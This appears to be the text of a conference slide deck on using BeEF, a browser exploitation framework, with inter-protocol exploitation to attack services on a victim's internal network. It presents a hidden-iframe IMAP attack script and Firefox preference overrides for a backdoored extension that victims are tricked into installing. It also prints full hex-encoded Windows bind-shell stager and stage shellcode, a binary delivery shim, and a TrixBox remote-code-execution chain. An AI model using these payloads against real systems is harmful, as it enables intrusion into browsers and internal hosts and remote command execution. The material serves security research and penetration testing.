This document discusses using the Browser Exploitation Framework (BeEF) and inter-protocol exploitation techniques to gain control of victim browsers. It begins with an overview of traditional browser attack vectors and their limitations. It then introduces BeEF and how it can be used to hook victim browsers through XSS and control them remotely with JavaScript. The document proposes revitalizing inter-protocol exploitation techniques to bypass cross-domain restrictions and allow executing commands on the victim's machine. It presents the design of a new BeEF Bind shellcode that sets up a web server to accept commands and control a process like cmd.exe on the victim internally without needing an outbound connection.
2. About myself
•Co-author of Browser Hacker’s
Handbook (now on pre-order from
Amazon.co.uk, available February/March 2014)
•BeEF lead core developer
•Application Security researcher
•Ruby, Javascript, OpenBSD and BlackMetal fan
3. • Current situation and traditional browser attack vectors
• BeEF and Inter-Protocol Exploitation
• The BeEF Bind shellcode
• How the shellcode delivery and exploitation works
• Demo fun, current limitations and...
About The Talk
4. • Aimed at compromise the browser itself, or plugins
• Sandboxes and exploit mitigation techniques make our life
difficult
• 0-day browser exploits are extremely expensive
Current situation
traditional browser attack vectors
5. • Is the victims web browser patched?
• Do you have $100k to spend on a single 0-day (weaponized)
browser exploit?
• How many times can you re-use your 0day for targeted attacks
before it will be detected, reversed and patched?
• How many useful browser exploits are available?
Current situation
Browser vulnerability exploitation
6. • Is the plugin patched or vulnerable?
• How reliable are the plugin exploits?
• most latest browsers don’t leak anymore exact plugin info
(except for Firefox, thanks Mozilla)
• Java-based exploits (also for ROP chains) require user-
intervention on many current browsers (i.e. Chrome)
• From Java 7 even unsigned applets require explicit user
intervention to run! (see Immunity bypass - now patched)
Current situation
Browser plugin exploitation
7. • Mis-understood, not patched, found in 90% of application pentests
• Full DOM manipulation
• SOP restrictions, additional HTTP headers restrictions, CSP
• In fact, alert(1) is the mostly used attack vector
• Oh, wait sorry, also stealing cookies...
Current situation
Cross Site Scripting
9. • Imagine a framework like Metasploit,
but for browser-based attacks
• Powerful platform for Client-side
pwnage, XSS post-exploitation and
generally victim browser security
context abuse.
• The framework allows the penetration
tester to select specific modules
(in real-time) to target each browser,
and therefore each context.
The scary BeEF
changing browser attack vectors
10. • Through a simple XSS or Phishing page, with BeEF we
can hook victim browsers and control them entirely
with Javascript
• No more alert(1) crap
• AntiVirus? Fuck that, it’s not going to detect BeEF
• Features like ManInTheBrowser,Tunneling Proxy and
remote exploits are all implemented in (relatively)
simple Javascript
The scary BeEF
changing browser attack vectors
11. Idea flow
read top to bottom
Michele:
Awesome, let me do some research
and lets port it to BeEF
Wade:
My IPEC research was cool, we
should research further
Ty:
I developed a new staging shellcode
that acts like a WebServer
12. • Back in 2006/2007 Wade Alcorn researched what he called
Inter-Protocol exploitation
• Exploit ‘tolerant’ protocol implementations, which do not
drop the client connection after N errors
• A properly encoded POST request can be sent to the target:
• HTTP request headers are parsed as BAD COMMANDS
• HTTP request body is parsed asVALID COMMANDS
• HTTP request body also contains shellcode. FUN STARTS
Revitalizing IPEC
Inter-Protocol Exploitation
13. Revitalizing IPEC
Inter-Protocol Exploitation: IMAP
var server = '172.16.37.151';
var port = '143';
var commands = 'a01 login root passwordna002 logout';
var target = "http://" + server + ":" + port + "/abc.html";
var iframe = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('name', 'data');
form.setAttribute('action', target);
form.setAttribute('method', 'post');
form.setAttribute('enctype', 'text/plain');
var input = document.createElement('input');
input.setAttribute('id', 'data1')
input.setAttribute('name', 'data1')
input.setAttribute('type', 'hidden');
input.setAttribute('value', commands);
form.appendChild(input);
iframe.contentWindow.document.body.appendChild(form);
form.submit();
14. • Limitations:
• SOP and cross-domain restrictions
• Port Banning (damn you!)
• HTTP Headers size
• HTTP Content-Type settings
• After exploitation, back to normal out-of-browser shells?
NOPE :D
Revitalizing IPEC
Inter-Protocol Exploitation: limitations
15. • Limitations:
• SOP and cross-domain restrictions
•PortBanning
•HTTP Headers size
•HTTP Content-Type settings
•After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC
Inter-Protocol Exploitation: solution 1
On all browsers (except Opera) we can
‘blindly’ send data cross-origin with
XHR, without the need to read HTTP
responses.
This is (usually) enough to pwn services.
16. • Limitations:
•SOP and cross-domain restrictions
• PortBanning
•HTTP Headers size
•HTTP Content-Type settings
•After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC
Inter-Protocol Exploitation: solution 2
http://xyz.com:143/
FF: NS_ERROR_PORT_ACCESS_NOT_ALLOWED
Connection to various known port
(22/25/143/993/995/etc..) denied.
On Firefox, an extension can override
config options:
17. • Limitations:
•SOP and cross-domain restrictions
• PortBanning
•HTTP Headers size
•HTTP Content-Type settings
•After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC
Inter-Protocol Exploitation: solution 2
Trick the victim to install a backdoor’ed Firefox
extension.The pref.js file of the extension
contains:
// PortBanning override
pref("network.security.ports.banned.override",
"20,21,22,25,110,143");
18. • Limitations:
•SOP and cross-domain restrictions
• PortBanning
•HTTP Headers size
•HTTP Content-Type settings
•After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC
Inter-Protocol Exploitation: solution 2
Only about 60 TCP ports are prohibited by Port
Banning -> 65465 are allowed :D
220 - imap3 (only IE blocks it :-)
6667 - IRC (Firefox/IE only)
9100 - jetdirect
10000 - ExtraNET
you name it: HP OpenView, Java RMI stuff, etc..
19. • Limitations:
• SOP and cross-domain restrictions
• PortBanning
• HTTP Headers size
• HTTP Content-Type settings
• After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC
Inter-Protocol Exploitation: solution 3
Lots of HTTP headers are automatically
created by the browser (around 400
bytes). Most of them cannot be
overridden, and cross-domain they are
even bigger.
We can override some of them:
20. • Limitations:
• SOP and cross-domain restrictions
• PortBanning
• HTTP Headers size
• HTTP Content-Type settings
• After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC
Inter-Protocol Exploitation: solution 3
We can save other 100 bytes overriding
the UserAgent through the Firefox
extension:
pref("general.useragent.override",
"Firefox/15.0.1");
21. • Limitations:
• SOP and cross-domain restrictions
• PortBanning
• HTTP Headers size
• HTTP Content-Type settings
• After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC
Inter-Protocol Exploitation: solution 4
The original IPEC paper was using:
Content-Type: multipart/form-data;
Our approach uses, to save space:
Content-Type: text/plain;
22. • Limitations:
• SOP and cross-domain restrictions
• PortBanning
• HTTP Headers size
• HTTP Content-Type settings
• After exploitation, back to normal out-of-browser shells?
Revitalizing IPEC
Inter-Protocol Exploitation: solution 5
Not anymore, thanks to the BeEF Bind
shellcode.
You have a bind shellcode which can be
totally controlled through an hooked
browser sitting in the same victim
internal network.
28. 28
BeEF Bind shellcode
how it works
• Ty Miller created a new staging Windows shellcode,
which we called BeEF Bind
• He was bored of reverse shells :D
• stager -> 299 bytes (326 after bad-char encoding)
• stage -> 792 bytes
• The stager sets up a bind port on 4444/TCP to accept
an HTTP POST request containing the raw stage in a
parameter called ‘cmd’.
var stager =
"xbax6ax99xf8x25xd9xccxd9x74x24xf4x5ex31xc9" +
"xb1x4bx83xc6x04x31x56x11x03x56x11xe2x9fx65" +
"x10xacx5fx96xe1xcfxd6x73xd0xddx8cxf0x41xd2" +
"xc7x55x6ax99x85x4dxf9xefx01x61x4ax45x77x4c" +
"x4bx6bxb7x02x8fxedx4bx59xdcxcdx72x92x11x0f" +
"xb3xcfxdax5dx6cx9bx49x72x19xd9x51x73xcdx55" +
"xe9x0bx68xa9x9exa1x73xfax0fxbdx3bxe2x24x99" +
"x9bx13xe8xf9xe7x5ax85xcax9cx5cx4fx03x5dx6f" +
"xafxc8x60x5fx22x10xa5x58xddx67xddx9ax60x70" +
"x26xe0xbexf5xbax42x34xadx1ex72x99x28xd5x78" +
"x56x3exb1x9cx69x93xcax99xe2x12x1cx28xb0x30" +
"xb8x70x62x58x99xdcxc5x65xf9xb9xbaxc3x72x2b" +
"xaex72xd9x24x03x49xe1xb4x0bxdax92x86x94x70" +
"x3cxabx5dx5fxbbxccx77x27x53x33x78x58x7axf0" +
"x2cx08x14xd1x4cxc3xe4xdex98x44xb4x70x73x25" +
"x64x31x23xcdx6exbex1cxedx91x14x35xdfxb6xc4" +
"x52x22x48xfaxfexabxaex96xeexfdx79x0fxcdxd9" +
"xb2xa8x2ex08xefx61xb9x04xe6xb6xc6x94x2dx95" +
"x6bx3cxa5x6ex60xf9xd4x70xadxa9x81xe7x3bx38" +
"xe0x96x3cx11x41x58xd3x9axb5x33x93xc9xe6xa9" +
"x13x86x50x8ax47xb3x9fx07xeexfdx35xa8xa2x51" +
"x9exc0x46x8bxe8x4exb8xfexbfx18x80x97xb8x8b" +
"xf3x4dx47x15x6fx03x23x57x1bxd8xedx4cx16x5d" +
"x37x96x26x84";
29. 29
BeEF Bind shellcode
how it works
• The stage sets up a bind port on 4444/TCP to accept
HTTP POST requests from the web browser.
• Set of pipes to redirect the cmd.exe input and output.
This allows to jump in the middle of the HTTP request
and the cmd.exe process to implement the web server
style functionality.
• The command result output is returned with the
Access-Control-Allow-Origin: * header. After the stage
is deployed, SOP is not a problem anymore.
var stage_allow_origin =
"xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28"
"x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52" +
"x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b" +
"x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38" +
"xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58" +
"x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5a" +
"x8bx12xebx86x5dxbbx00x10x00x00x6ax40x53x53x6ax00x68x58xa4x53xe5xffxd5" +
"x89xc6x68x01x00x00x00x68x00x00x00x00x68x0cx00x00x00x68x00x00x00x00x89" +
"xe3x68x00x00x00x00x89xe1x68x00x00x00x00x8dx7cx24x0cx57x53x51x68x3excf" +
"xafx0exffxd5x68x00x00x00x00x89xe3x68x00x00x00x00x89xe1x68x00x00x00x00" +
"x8dx7cx24x14x57x53x51x68x3excfxafx0exffxd5x8bx5cx24x08x68x00x00x00x00" +
"x68x01x00x00x00x53x68xcax13xd3x1cxffxd5x8bx5cx24x04x68x00x00x00x00x68" +
"x01x00x00x00x53x68xcax13xd3x1cxffxd5x89xf7x68x63x6dx64x00x89xe3xffx74" +
"x24x10xffx74x24x14xffx74x24x0cx31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3c" +
"x01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79" +
"xccx3fx86xffxd5x89xfexb9xf8x0fx00x00x8dx46x08xc6x00x00x40xe2xfax56x8d" +
"xbex18x04x00x00xe8x62x00x00x00x48x54x54x50x2fx31x2ex31x20x32x30x30x20" +
"x4fx4bx0dx0ax43x6fx6ex74x65x6ex74x2dx54x79x70x65x3ax20x74x65x78x74x2f" +
"x68x74x6dx6cx0dx0ax41x63x63x65x73x73x2dx43x6fx6ex74x72x6fx6cx2dx41x6c" +
"x6cx6fx77x2dx4fx72x69x67x69x6ex3ax20x2ax0dx0ax43x6fx6ex74x65x6ex74x2d" +
"x4cx65x6ex67x74x68x3ax20x33x30x31x36x0dx0ax0dx0ax5exb9x62x00x00x00xf3" +
"xa4x5ex56x68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90" +
"x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68" +
"xeax0fxdfxe0xffxd5x97x31xdbx53x68x02x00x11x5cx89xe6x6ax10x56x57x68xc2" +
"xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xff" +
"xd5x57x97x68x75x6ex4dx61xffxd5x81xc4xa0x01x00x00x5ex89x3ex6ax00x68x00" +
"x04x00x00x89xf3x81xc3x08x00x00x00x53xffx36x68x02xd9xc8x5fxffxd5x8bx54" +
"x24x64xb9x00x04x00x00x81x3bx63x6dx64x3dx74x06x43x49xe3x3axebxf2x81xc3" +
"x03x00x00x00x43x53x68x00x00x00x00x8dxbex10x04x00x00x57x68x01x00x00x00" +
"x53x8bx5cx24x70x53x68x2dx57xaex5bxffxd5x5bx80x3bx0ax75xdax68xe8x03x00" +
"x00x68x44xf0x35xe0xffxd5x31xc0x50x8dx5ex04x53x50x50x50x8dx5cx24x74x8b" +
"x1bx53x68x18xb7x3cxb3xffxd5x85xc0x74x44x8bx46x04x85xc0x74x3dx68x00x00" +
"x00x00x8dxbex14x04x00x00x57x68x86x0bx00x00x8dxbex7ax04x00x00x57x8dx5c" +
"x24x70x8bx1bx53x68xadx9ex5fxbbxffxd5x6ax00x68xe8x0bx00x00x8dxbex18x04" +
"x00x00x57xffx36x68xc2xebx38x5fxffxd5xffx36x68xc6x96x87x52xffxd5xe9x38" +
"xfexffxff";
30. • Shellcode is binary data
• Stager and Stage are delivered with
XMLHttpRequest.sendAsBinary
• For Webkit browsers that don’t support
sendAsBinary, prototype overriding on XHR object.
BeEF Bind shellcode
delivery and usage from within BeEF
if (!XMLHttpRequest.prototype.sendAsBinary) {
XMLHttpRequest.prototype.sendAsBinary = function (sData) {
var nBytes = sData.length, ui8Data = new Uint8Array(nBytes);
for (var nIdx = 0; nIdx < nBytes; nIdx++) {
ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff;
}
this.send(ui8Data);
};}
Stager - Stage
31. • We cannot know in advance the exact size
of HTTP headers.
• A dummy cross-domain XHR request is
sent back to BeEF, exact size of headers is
calculated, and exploit junk is adjusted
accordingly.
• Like in all exploits, 1 byte error is enough
to have a not-working exploit.
• With this approach, errors are minimized
and the exploit becomes reliable.
BeEF Bind shellcode
delivery and usage from within BeEF
32. • Typical SEH exploit with EggHunter, non-IPEC:
• commands + junk + shellcode + next_seh + seh + egg_hunter
• Typical SEH exploit with EggHunter, IPEC:
• HTTP_headers + commands + (less)junk + shellcode + next_seh + seh + egg_hunter
BeEF Bind shellcode
delivery and usage from within BeEF
33. BeEF Bind shellcode
delivery and usage from within BeEF
Immunity DBG view: IMAP process
memory when sending the stager
34. BeEF Bind shellcode
delivery and usage from within BeEF
Wireshark view: exploit with
shellcode stager Wireshark view: command delivery and results
35. 35
BeEF Bind shellcode
delivery and usage from within BeEF
Ultimate fun.
BeEF IPEC shell (JS)
exec command
get results
set target
37. • Bart Leppens ported the Win32 BeEF Bind shellcode to Linux
• Great to be used as shellcode for normal Linux exploits
• Great to be used as a binary with any Remote Command Execution
• TrixBox <= 2.6.1 pre-auth RCE example with BeEF Bind Linux
• Exploit here (through normal sockets, not from the browsers):
http://www.exploit-db.com/exploits/6026/
BeEF Bind shellcode
delivery and usage from within BeEF
38. • Identify TrixBox in the hooked browser internal network (BeEF
“internal_network_fingerprinting”module)
• Get the current PHPSESSID, needed to trigger the
malicious PHP code that will be leaving in PHP’s $_SESSION object
• The attack vector downloads the BeEF
Bind shellcode stager and executes it
• Last step is send to the stager
bind port the Stage contents
• You’re now ready to send commands and get
results from the hooked browser
BeEF Bind shellcode
delivery and usage from within BeEF
40. • Wade and the other BeEF guys
• Ty and Bart for their awesome shellcodes
• Mario and the other awesome speakers
• If you want to support BeEF, buy our book. 50%
of royalties will be used exclusively for the BeEF
project (no joke)!
• http://www.amazon.co.uk/Browser-Hackers-Handbook-
Wade-Alcorn/dp/1118662091/
Thanks